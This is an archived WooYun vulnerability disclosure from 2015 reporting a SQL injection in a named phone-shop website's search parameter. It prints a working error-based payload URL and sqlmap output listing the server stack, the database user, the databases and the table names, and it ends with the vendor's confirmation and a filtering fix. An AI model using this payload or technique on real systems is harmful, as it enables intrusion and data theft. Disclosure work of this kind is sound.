乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-30: 细节已通知厂商并且等待厂商处理中 2015-03-30: 厂商已经确认,细节仅向厂商公开 2015-04-09: 细节向核心白帽子及相关领域专家公开 2015-04-19: 细节向普通白帽子公开 2015-04-29: 细节向实习白帽子公开 2015-05-14: 细节向公众公开
丫丫手机商城sql注入一枚
http://mtest.yaya888.com/list.php?cat=1&id=62&f2=&f3=%E7%BF%BB%E7%9B%96&f4=%E5%85%A8%E9%94%AE%E7%9B%98&f5=%E6%97%A0%E6%91%84%E5%83%8F%E5%A4%B4&f6=IOS&price=1000-1499&f8=500%E4%B8%87%E5%83%8F%E7%B4%A0%E5%8F%8A%E4%BB%A5%E4%B8%8A&f9=2.1-3.0%E8%8B%B1%E5%AF%B8
搜索型sql注入一枚,存在注入的参数 f2=
Place: URIParameter: #1* Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: http://mtest.yaya888.com:80/list.php?cat=1&id=62&f2=%' AND (SELECT1417 FROM(SELECT COUNT(*),CONCAT(0x7170767171,(SELECT (CASE WHEN (1417=1417) THEN 1 ELSE 0 END)),0x7171707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) and '%'='&f3=%E7%BF%BB%E7%9B%96&f4=%E5%85%A8%E9%94%AE%E7%9B%98&f5=%E6%97%A0%E6%91%84%E5%83%8F%E5%A4%B4&f6=IOS&price=1000-1499&f8=500%E4%B8%87%E5%83%8F%E7%B4%A0%E5%8F%8A%E4%BB%A5%E4%B8%8A&f9=2.1-3.0%E8%8B%B1%E5%AF%B8---[21:20:15] [INFO] testing MySQL[21:20:15] [WARNING] reflective value(s) found and filtering out[21:20:15] [INFO] confirming MySQL[21:20:15] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 2008 R2 or 7web application technology: Microsoft IIS 7.5, ASP.NET, PHP 5.2.8back-end DBMS: MySQL >= 5.0.0[21:20:15] [INFO] fetching current user[21:20:15] [INFO] retrieved: yaya_cdb_pc@%current user: 'yaya_cdb_pc@%'
available databases [10]:[*] baobao[*] information_schema[*] kmyaya[*] kmyaya6[*] kmyaya_bak[*] kmyaya_bak2[*] kmyaya_bak3[*] mysql[*] test[*] yaya_appapi
看下是不是你们的数据库。。
Database: kmyaya6[98 tables]+------------------------+| coupon_con || coupon_stuff || coupon_verify || coupon_visits || game_cd_gift || game_cd_user || game_zhuanpan_gift || game_zhuanpan_gift_bak || game_zhuanpan_open || game_zhuanpan_open_bak || game_zhuanpan_pici || game_zhuanpan_user || game_zhuanpan_user_bak || lottery || lottery_activity || lottery_log || oa_active_log || oa_active_order || oa_article || oa_backvisit || oa_computer || oa_customer || oa_customer_log || oa_customer_score_log || oa_document || oa_ip || oa_iplogin || oa_modlist || oa_money_class || oa_money_detail || oa_offer_code || oa_offer_event || oa_offer_task || oa_personnel_files || oa_qwgh || oa_reset || oa_service || oa_set_depart || oa_set_member_rank || oa_set_parameter || oa_set_shop || oa_stock || oa_stock_archive || oa_stock_booking || oa_stock_detail || oa_stock_inventory || oa_stock_move || oa_url || oa_user || oa_user_log || oa_user_login || oa_usergroup || oa_wx_status || sms_sended || sms_sending || sms_tpl || sms_user || sys_actgoods || sys_ad || sys_ad_position || sys_address || sys_admin || sys_admin_log || sys_admin_login || sys_ads || sys_advertisement || sys_app_fenlei || sys_article || sys_article_cat || sys_bai_nian || sys_brand || sys_brands || sys_byself || sys_cart || sys_cart_detail || sys_client_company || sys_client_phone || sys_client_question || sys_client_records || sys_codesend || sys_comment || sys_contract || sys_contract_a || sys_contract_config || sys_cprice || sys_cup_comment || sys_cup_match || sys_cup_taking || sys_district || sys_friend_link || sys_friendlink || sys_game_batch || sys_game_gift || sys_game_open || sys_game_order || sys_game_type || sys_game_user || sys_goods |+------------------------+
看下是不是你么的表。。。
如上
过滤 % 和 ' 就可以了。。
危害等级:高
漏洞Rank:10
确认时间:2015-03-30 12:57
非常谢谢
暂无